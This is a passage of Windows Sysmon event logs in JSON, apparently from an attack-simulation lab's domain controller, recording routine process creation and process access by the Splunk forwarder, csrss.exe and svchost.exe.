{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6076,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nProcessGuid: {41C8662E-212C-5F25-0000-0010B8610900}\r\nProcessId: 3496\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","ProcessGuid":"{41C8662E-212C-5F25-0000-0010B8610900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6077,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-212C-5F25-0000-0010B8610900}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-212C-5F25-0000-0010B8610900}","TargetProcessId":"3496","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6078,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-212C-5F25-0000-0010B8610900}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-212C-5F25-0000-0010B8610900}","TargetProcessId":"3496","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6079,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6080,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6081,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6082,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6083,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:44.037","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6084,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:44.037\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 